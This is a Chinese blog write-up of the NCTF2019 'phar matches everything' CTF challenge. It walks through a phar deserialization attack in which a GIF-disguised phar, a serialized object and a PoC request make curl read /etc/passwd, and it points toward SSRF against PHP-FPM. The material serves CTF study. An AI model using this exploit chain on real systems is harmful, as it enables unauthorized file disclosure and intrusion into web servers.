[NCTF2019]phar matches everything

最新推荐文章于 2024-07-02 20:56:08 发布
最新推荐文章于 2024-07-02 20:56:08 发布
阅读量961 收藏
点赞数
分类专栏: PHP代码审计 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soldi_er/article/details/117702437
版权

文章目录

信息搜集、验证利用条件

####验证利用条件

  phar反序列化漏洞的三个条件:可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。

  (1)条件一:上传文件到服务端,满足。
  (2)可控参数和解析函数,通过前端代码找到catchmime.php的post参数name,可以访问服务器文件,满足。
  (3)可执行的类、以及魔法函数,缺失信息。

信息搜集

  dirsearch进行目录扫描,返回429限制请求速度。

  源码在哪里?无信息:/robots.txt、/hint.php。使用御剑2线程,没找到信息文件。

  扫一眼wp,发现这道题目是提供源码的。下载源码。

####审计源码

  寻找可控参数,catchmine.php可用getimagesize($_POST['name']);来访问phar文件。
经过测试,getimagesize()可以解析 phar://触发反序列化。这意味着构造的 u r l 会 被 解 析 。 接 下 来 寻 找 执 行 url会被解析。接下来寻找执行 urlurl的函数。
  访问phar文件的payload:name=phar://phar.gif。

  找到类了,跳板函数只有echo curl_exec(this->url),其中参数可控。
这个函数访问目标资源,并输出执行结果,会导致SSRF漏洞。
  一般我们利用反序列化漏洞,最希望的跳板函数是eval(),直接执行构造的php代码。
但如果跳板函数不是eval(),我们如何执行命令触发RCE?这就是题目考点。

class Main {
    public $url;
    public function curl($url){
        $ch = curl_init();  
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        $output=curl_exec($ch);
        curl_close($ch);
        return $output;
    }

	public function __destruct(){
        $this_is_a_easy_test=unserialize($_GET['careful']);	// 可控参数
        if($this_is_a_easy_test->funny_get() === '1'){
            echo $this->curl($this->url);
        }
    }    
}

查看WP

  这道题目的考点:phar反序列化漏洞+SSRF漏洞+PHP-FPM未授权访问漏洞。
phar反序列化没有直接执行命令的跳板函数,需要结合另外两个漏洞进行利用。

  学习了php-fpm任意命令执行漏洞,Apache默认以module方式加载php,Nginx默认以CGI模式加载php。其中Nginx与CGI的通信方式有两种,分别是TCP和默认的Unix Socket
而默认的Unix Socket模式,利用条件是上传php文件执行代码

  出于 恒初忌深远 的考虑,采取SSRF漏洞任意读取文件。

漏洞利用

  触发phar反序列化漏洞:curl_exec(“file:///etc/passwd”)。

构造phar文件

  生成phar.phar文件,修改后缀为.jpg,上传phar.jpg到服务器。
The file 95aa6b74ea.gif has been uploaded to ./uploads/

<?php
    class Main {
	public $url;
    }
    $o = new Main();
    $o -> url ="file:///etc/passwd";


    $phar = new Phar("phar.phar"); //后缀名必须为phar
    $phar->startBuffering();
    $phar->setStub("GIF89A"."<?php __HALT_COMPILER(); ?>"); //设置stub
   
    $phar->setMetadata($o); //将自定义的meta-data存入manifest
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
    //签名自动计算
    $phar->stopBuffering();
?>
绕过简单检查

  正确示范的代码如下,返回报错信息及/etc/passwd文件内容,成功读取/etc/passwd。
failed to open stream: phar error: file "" in phar "uploads/95aa6b74ea.gif" cannot be empty

<?php
class Easytest{
    protected $test="1";
    
}
$o = new Easytest();
echo urlencode(serialize($o));
?>

  这里有一个坑,务必使用php进行URL编码。
错误示范:输出序列化结果如下,然后使用工具或在线网站进行URL编码。
O:8:"Easytest":1:{s:7:"*test";s:1:"1";}
报错:Stack trace: #0 [internal function]: Main->__destruct() #1 {main} thrown。

Poc

  成功读取/etc/passwd文件:

	访问URL地址及get参数
/catchmime.php?careful=O%3A8%3A%22Easytest%22%3A1%3A%7Bs%3A7%3A%22%00%2A%00test%22%3Bs%3A1%3A%221%22%3B%7D

	POST数据
submit=1&name=phar://uploads/95aa6b74ea.gif

####猜测flag文件位置

  猜解flag文件位置:/flag或者/var/www/html/flag.php。
直接修改phar.gif中的触发代码为:file:///flag,返回报错信息。开wp视角,没有/flag文件。
failed to open stream: manifest cannot be larger than 100 MB in phar

  这道题目涉及到内网SSRF、php-fpm未授权访问漏洞。flag在内网机器的/flag文件中,
这道题目先到这里。

区块链市场观察家
关注
专栏目录
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
『CTF Web复现』BUUCTF-[NCTF2019]phar matches everything(自动化脚本获取flag)
Ho1aAs‘s Blog
09-07 1449
特点:自动化python脚本获取flag;利用点:unserialize反序列化;phar反序列化;添加图片头和更改MIME、后缀绕过文件上传检测;ssrf gopher协议打php-fpm;绕过open_basedir
NSSCTF-Web题目21(文件上传-phar协议、RCE-空格绕过)
weixin_54055099的博客
07-02 583
phar伪协议、RCE-空格绕过
BUUCTF:[NCTF2019]phar matches everything
末初的CSDN博客
07-28 1836
题目地址:https://buuoj.cn/challenges#[NCTF2019]phar%20matches%20everything 源码地址:https://github.com/swfangzhang/My-2019NCTF/tree/master/phar matches everything catchmime.php //catchmime.php <?php class Easytest{ protected $test; public function funn
Phar反序列化
xiaolong22333的博客
04-24 2684
在软件中,PHAR(PHP归档)文件是一种打包格式,通过将许多PHP代码文件和其他资源(例如图像,样式表等)捆绑到一个归档文件中来实现应用程序和库的分发 phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。 Phar需要 PHP >= 5.2 在php.ini中将phar.readonly设为Off(注意去掉前面的分号) phar文件的结构 stub:phar文件的标志,必须以.
phar.php error 139,PHP致命错误:带有消息清单的未捕获异常PharException(PHP Fatal error: Uncaught exception PharExcepti...
weixin_39824529的博客
04-02 821
PHP致命错误:带有消息清单的未捕获异常PharException(PHP Fatal error: Uncaught exception PharException with message manifest)尝试通过命令行安装composer.phar出错PHP Fatal error: Uncaught exception 'PharException' with message manif...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛是一项旨在推动我国高校电子信息类专业教学改革,提高学生动手能力和工程实践能力的重要赛事。这个.7z压缩包文件包含了自大赛创办以来,从第一届到第十四届的所有竞赛题目,对于参赛学生、...
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
南京邮电大学第十一届网络攻防大赛开源题目_NCTF2022.zip
最新发布
09-01
南京邮电大学第十一届网络攻防大赛开源题目_NCTF2022
RSA加密软件 (VC++,MFC程序实现)
05-27
RSA加密程序实现VC++ ,MFC 可以产生任意位数的大数素,可以作为毕业论文哈。也是学习RSA加密的好例子,可以学到很多的加密函数和加密算法,很多算法是很经典的 ,比如欧拉定理,费马定理,还有中国剩余定理等.........
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
超微X11SPH-NCTPF主板用户手册
04-01
超微X11SPH-NCTPF主板用户手册
南京邮电大学第十一届网络攻防大赛开源题目.zip
10-23
开源题目.zip文件很可能是本次大赛提供的挑战题目集合,其中包含了一个名为"NCTF2022-main"的子文件。这个压缩包很可能是为了参赛者准备的,让他们在解压后可以接触到具体的赛题,进行实战演练。 网络安全攻防大赛...
php安装pear
东垂小夫
11-25 3761
按照php pear,下载 go-pear.phar 的时候,不应该直接打开下载链接然后复制代码保存到文件中,而应该直接下载文件,比如“将链接另存为”。
Phar 文件上传以及反序列化
十一.的博客
11-13 608
第2步:把生成的exp.phar,改成exp.zip(题目白名单过滤)然后通过文件上传功能点上传。2.phar://伪协议 是php解压缩报的一个函数,不管后缀是什么,都会当做压缩包来解压。第3步:访问 图片路径/test.php (由于题目会加php后缀,则文件包含的时候不用加)首先生成上传phar文件(改后缀为jpg绕过检测)(1)不涉及反序列化,文件上传+文件包含 上传。首先构造phar文件 ,然后上传。5.关闭readonly模式。1、能将phar文件上传。将 phar 文件使用。
极客巅峰 2020 babyphp2(phar反序列化)
y0un9er
10-02 743
文章目录前言一、什么是 phar 反序列化1.三个条件2.生成 phar 文件的常见代码题目分析下载源码classes.php生成 phar 文件总结 前言 这题比赛的时候,我一脸懵逼,大佬提示才知道源码泄露。但是之前没做过 phar 反序列化的题,二脸懵逼。还好源码没删,自己搭建了环境,看着大佬们的wp复现一番。点击打开题目 VPS 20年12月10号过期,望见谅。 一、什么是 phar 反序列化 利用Phar:// 伪协议读取phar文件时,会反序列化meta-data储存的信息。phar简介 .
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值